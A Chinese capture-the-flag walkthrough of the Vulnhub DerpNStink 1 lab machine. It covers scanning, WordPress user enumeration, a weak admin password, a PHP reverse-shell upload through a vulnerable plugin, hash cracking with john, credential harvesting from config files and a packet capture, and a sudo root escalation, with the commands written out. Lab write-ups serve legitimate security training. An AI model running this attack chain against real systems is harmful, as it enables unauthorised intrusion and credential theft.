Vulnhub:DerpNStink 1靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问
通过wpscan枚举出目标存在admin用户
wpscan --url http://derpnstink.local/weblog/ -e u
尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意文件上传漏洞
searchsploit slideshow
漏洞利用
直接上传php反弹shell
上传后访问:http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/php-reverse-shell.php,获得反弹shell
提权
在/var/www/html/weblog/wp-config.php,发现mysql数据库账号密码
在wordpress数据库的wp_users表中发现两个用户和密码密文
使用john爆破unclestinky用户的密码
john hash --wordlist=/usr/share/wordlists/rockyou.txt
使用密码:wedgie57,切换到用户stinky
在/home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/目录下发现私钥文件
尝试使用该私钥文件登录到mrderp用户,发现需要密码
在/home/stinky/Documents/目录发现一个流量包,下载到kali查看
在其中一条post请求中发现mrderp用户的密码:derpderpderpderpderpderpderp
登录到mrderp用户
查看mrderp用户的sudo权限
在/home/mrderp/目录下创建binaries目录,在binaries目录里创建名字为derpy.sh的shell脚本,脚本内容写入提权命令
cd /home/mrderp/
mkdir binaries
cd binaries
echo '/bin/bash' > derpy.sh
chmod 777 derpy.sh
sudo -u root /home/mrderp/binaries/derpy.sh
flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义